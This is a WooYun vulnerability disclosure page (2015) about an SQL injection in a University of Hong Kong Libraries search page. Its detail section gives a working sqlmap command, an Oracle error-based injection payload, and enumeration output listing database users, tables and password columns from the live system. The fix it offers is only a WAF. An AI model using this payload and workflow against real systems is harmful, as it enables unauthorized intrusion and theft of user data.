The University of Hong Kong Libraries存在SQL注射漏洞(182W用户信息泄露)（香港地區）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0158869

漏洞标题：The University of Hong Kong Libraries存在SQL注射漏洞(182W用户信息泄露)（香港地區）

漏洞作者：路人甲

提交时间：2015-12-07 11:32

修复时间：2015-12-21 09:37

公开时间：2015-12-21 09:37

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-12-07：细节已通知厂商并且等待厂商处理中
2015-12-10：厂商已经确认，细节仅向厂商公开
2015-12-20：细节向核心白帽子及相关领域专家公开
2015-12-21：厂商已经修复漏洞并主动公开，细节向公众公开

简要描述：

The University of Hong Kong Libraries存在SQL注射漏洞(182W用户信息泄露)

详细说明：

地址：http://**.**.**.**/ER/search.jsp?the_key=China+Biography&the_field=sb&the_lang=a

$ python sqlmap.py -u "http://**.**.**.**/ER/search.jsp?the_key=China+Biography&the_field=sb&the_lang=a" -p the_key --technique=E --output-dir=output --random-agent --batch  --no-cast -D NDLC -T EJ_996 --columns

Database: NDLC
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| EJ_996                         | 1820120 |

web application technology: JSP
back-end DBMS: Oracle
Database: NDLC
Table: EJ_996
[17 columns]
+--------------------+----------+
| Column             | Type     |
+--------------------+----------+
| NO_USERS           | VARCHAR2 |
| SUBFIELDZ_PASSWORD | VARCHAR2 |
| URL_PASSWORD       | VARCHAR2 |
+--------------------+----------+

漏洞证明：

---
Parameter: the_key (GET)
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)
    Payload: the_key=China Biography'||(SELECT 'JUyI' FROM DUAL WHERE 4168=4168 AND 2419=CTXSYS.DRITHSX.SN(2419,(CHR(113)||CHR(112)||CHR(113)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (2419=2419) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(98)||CHR(107)||CHR(113))))||'&the_field=sb&the_lang=a
---
web application technology: JSP
back-end DBMS: Oracle
current user:    'NDLC'
current user is DBA:    False
database management system users [60]:
[*] ANONYMOUS
[*] APEX_030200
[*] APEX_PUBLIC_USER
[*] APPQOSSYS
[*] BASICLAW
[*] BI
[*] BRO
[*] CTXSYS
[*] DBSNMP
[*] DIP
[*] DWLOG
[*] EXFSYS
[*] FLOWS_FILES
[*] FOTEST
[*] HKOH
[*] HKUTO
[*] HONOUR
[*] HR
[*] HUBREAD
[*] ICALADM
[*] INNOFO
[*] INNOPAC
[*] ISFORM
[*] IX
[*] JETCO
[*] LBIB
[*] MDDATA
[*] MDSYS
[*] MGMT_VIEW
[*] MISCTEST
[*] NDLC
[*] NDLCTEST
[*] OE
[*] OLAPSYS
[*] ORACLE_OCM
[*] ORDDATA
[*] ORDPLUGINS
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] OWBSYS_AUDIT
[*] PM
[*] RBR
[*] REFFORM
[*] RSCHK
[*] SCHK
[*] SCHK_STAFF
[*] SCOTT
[*] SH
[*] SI_INFORMTN_SCHEMA
[*] SPATIAL_CSW_ADMIN_USR
[*] SPATIAL_WFS_ADMIN_USR
[*] SRSADM
[*] STATS
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WMSYS
[*] XDB
[*] XS$NULL
Database: APEX_030200
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| WWV_FLOW_DUAL100               | 100     |
+--------------------------------+---------+
Database: SYSTEM
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| HELP                           | 919     |
+--------------------------------+---------+
Database: SYS
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| AW$AWMD                        | 728     |
| STMT_AUDIT_OPTION_MAP          | 268     |
| SYSTEM_PRIVILEGE_MAP           | 208     |
| AUDIT_ACTIONS                  | 177     |
| AW$AWXML                       | 137     |
| AW$EXPRESS                     | 101     |
| AW$AWCREATE                    | 51      |
| AW$AWCREATE10G                 | 27      |
| AW$AWREPORT                    | 27      |
| TABLE_PRIVILEGE_MAP            | 26      |
| "DUAL"                         | 1       |
+--------------------------------+---------+
Database: MDSYS
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| SDO_COORD_OP_PARAM_VALS        | 9736    |
| SDO_COORD_REF_SYS              | 4426    |
| SDO_CS_SRS                     | 4426    |
| SDO_COORD_OPS                  | 2279    |
| SDO_COORD_OP_PARAM_USE         | 718     |
| SDO_DATUMS                     | 535     |
| SDO_COORD_OP_PATHS             | 365     |
| SDO_COORD_OP_PARAMS            | 153     |
| SDO_COORD_AXES                 | 139     |
| SDO_UNITS_OF_MEASURE           | 132     |
| SDO_DATUMS_OLD_SNAPSHOT        | 118     |
| SDO_ELLIPSOIDS                 | 96      |
| SDO_CRS_GEOGRAPHIC_PLUS_HEIGHT | 95      |
| SDO_COORD_OP_METHODS           | 85      |
| SDO_COORD_SYS                  | 65      |
| SDO_ELLIPSOIDS_OLD_SNAPSHOT    | 47      |
| SDO_PROJECTIONS_OLD_SNAPSHOT   | 42      |
| SDO_COORD_AXIS_NAMES           | 28      |
| SDO_PRIME_MERIDIANS            | 16      |
| SDO_XML_SCHEMAS                | 3       |
| SDO_GEOR_XMLSCHEMA_TABLE       | 1       |
+--------------------------------+---------+
Database: NDLC
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| DR$NDLC_INDEX$I                | 7103205 |
| BIB_SUBJ                       | 2012382 |
| EJ_996                         | 1820120 |
| BIB_TYPE                       | 1672433 |
| TITLE                          | 1669310 |
| DR$NDLC_INDEX$K                | 1282960 |
| TMP_BIB                        | 1196192 |
| FULLTITLE                      | 571664  |
| DR$NDLC_INDEX$N                | 177446  |
| COMPLETELIST_AGGR              | 40726   |
| TMP_DEL_REC                    | 19944   |
| CORE                           | 1154    |
| SUBJECT_DDC                    | 1013    |
| TC                             | 499     |
| LANG                           | 375     |
| SUBJECT                        | 131     |
| KEYDB                          | 101     |
| EJ_991                         | 89      |
| LOCATION                       | 50      |
| DB_SUBJECT                     | 49      |
| TYPE                           | 48      |
| TYPE_COUNT                     | 33      |
| CAT                            | 28      |
| DR$NDLC_INDEX$R                | 22      |
| BROAD_SUBJECT                  | 10      |
| NOTES                          | 9       |
| SUBJECT_GP                     | 9       |
+--------------------------------+---------+
Database: HKUTO
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| LANG                           | 375     |
+--------------------------------+---------+
Database: CTXSYS
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| DR$OBJECT_ATTRIBUTE            | 480     |
| DR$NUMBER_SEQUENCE             | 256     |
+--------------------------------+---------+
columns LIKE 'PASS' were found in the following databases:
Database: SYS
Table: KU$_PROFILE_VIEW
[1 column]
+----------------+----------+
| Column         | Type     |
+----------------+----------+
| PASS_FUNC_NAME | VARCHAR2 |
+----------------+----------+
Database: SYS
Table: EXU9LNKU
[2 columns]
+-------------+----------+
| Column      | Type     |
+-------------+----------+
| AUTH_PASSWD | VARCHAR2 |
| PASSWD      | VARCHAR2 |
+-------------+----------+
Database: SYS
Table: KU$_ROLE_VIEW
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| PASSWORD | VARCHAR2 |
+----------+----------+
Database: SYS
Table: ALL_SQLSET_PLANS
[3 columns]
+------------------------+--------+
| Column                 | Type   |
+------------------------+--------+
| ESTIMATED_ONEPASS_SIZE | NUMBER |
| MULTIPASSES_EXECUTIONS | NUMBER |
| ONEPASS_EXECUTIONS     | NUMBER |
+------------------------+--------+
Database: SYS
Table: EXU8LNKU
[1 column]
+--------+----------+
| Column | Type     |
+--------+----------+
| PASSWD | VARCHAR2 |
+--------+----------+
Database: SYS
Table: KU$_USER_VIEW
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| PASSWORD | VARCHAR2 |
+----------+----------+
Database: SYS
Table: KU$_DBLINK_VIEW
[2 columns]
+-----------+----------+
| Column    | Type     |
+-----------+----------+
| PASSWORD  | VARCHAR2 |
| PASSWORDX | RAW      |
+-----------+----------+
Database: SYS
Table: KU$_10_1_DBLINK_VIEW
[2 columns]
+-----------+----------+
| Column    | Type     |
+-----------+----------+
| PASSWORD  | VARCHAR2 |
| PASSWORDX | RAW      |
+-----------+----------+
Database: SYS
Table: USER_DB_LINKS
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| PASSWORD | VARCHAR2 |
+----------+----------+
Database: SYS
Table: EXU10LNKU
[4 columns]
+--------------+----------+
| Column       | Type     |
+--------------+----------+
| AUTH_PASSWD  | VARCHAR2 |
| AUTH_PASSWDX | RAW      |
| PASSWD       | VARCHAR2 |
| PASSWDX      | RAW      |
+--------------+----------+
Database: SYS
Table: EXU8USRU
[1 column]
+--------+----------+
| Column | Type     |
+--------+----------+
| PASSWD | VARCHAR2 |
+--------+----------+
Database: SYS
Table: USER_SQLSET_PLANS
[3 columns]
+------------------------+--------+
| Column                 | Type   |
+------------------------+--------+
| ESTIMATED_ONEPASS_SIZE | NUMBER |
| MULTIPASSES_EXECUTIONS | NUMBER |
| ONEPASS_EXECUTIONS     | NUMBER |
+------------------------+--------+
Database: APEX_030200
Table: WWV_FLOW_USERS
[6 columns]
+------------------------------+----------+
| Column                       | Type     |
+------------------------------+----------+
| CHANGE_PASSWORD_ON_FIRST_USE | VARCHAR2 |
| FIRST_PASSWORD_USE_OCCURRED  | VARCHAR2 |
| PASSWORD_ACCESSES_LEFT       | NUMBER   |
| PASSWORD_DATE                | DATE     |
| PASSWORD_LIFESPAN_ACCESSES   | NUMBER   |
| PASSWORD_LIFESPAN_DAYS       | NUMBER   |
+------------------------------+----------+
Database: NDLC
Table: EJ_996
[2 columns]
+--------------------+----------+
| Column             | Type     |
+--------------------+----------+
| SUBFIELDZ_PASSWORD | VARCHAR2 |
| URL_PASSWORD       | VARCHAR2 |
+--------------------+----------+

web application technology: JSP
back-end DBMS: Oracle
Database: NDLC
Table: EJ_996
[17 columns]
+--------------------+----------+
| Column             | Type     |
+--------------------+----------+
| BIB                | NUMBER   |
| COVERAGE           | VARCHAR2 |
| FORMAT             | VARCHAR2 |
| IP_FILTER          | VARCHAR2 |
| LOCATION           | VARCHAR2 |
| MEGACD             | VARCHAR2 |
| NO_USERS           | VARCHAR2 |
| NOTES              | CHAR     |
| NOTES_URL          | VARCHAR2 |
| SUBFIELD_Z         | VARCHAR2 |
| SUBFIELDZ_OTHERS   | VARCHAR2 |
| SUBFIELDZ_PASSWORD | VARCHAR2 |
| URL                | VARCHAR2 |
| URL_OTHERS         | VARCHAR2 |
| URL_PASSWORD       | VARCHAR2 |
| VIA                | VARCHAR2 |
| WF                 | NUMBER   |
+--------------------+----------+

修复方案：

上WAF。

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：14

确认时间：2015-12-10 17:01

厂商回复：

已將事件通知有關機構

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0158869

漏洞标题：The University of Hong Kong Libraries存在SQL注射漏洞(182W用户信息泄露)（香港地區）

相关厂商：The University of Hong Kong Libraries

漏洞作者：路人甲

提交时间：2015-12-07 11:32

修复时间：2015-12-21 09:37

公开时间：2015-12-21 09:37

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0158869

漏洞标题：The University of Hong Kong Libraries存在SQL注射漏洞(182W用户信息泄露)（香港地區）

相关厂商：The University of Hong Kong Libraries

漏洞作者： 路人甲

提交时间：2015-12-07 11:32

修复时间：2015-12-21 09:37

公开时间：2015-12-21 09:37

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态： 已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0158869"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

漏洞状态：已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云